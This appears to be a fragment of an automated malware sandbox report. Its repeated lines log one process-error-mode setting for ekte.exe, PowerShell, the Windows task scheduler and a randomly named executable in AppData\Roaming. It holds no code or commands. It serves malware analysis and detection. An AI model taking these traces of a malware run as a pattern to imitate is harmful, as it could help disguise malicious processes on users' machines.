            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
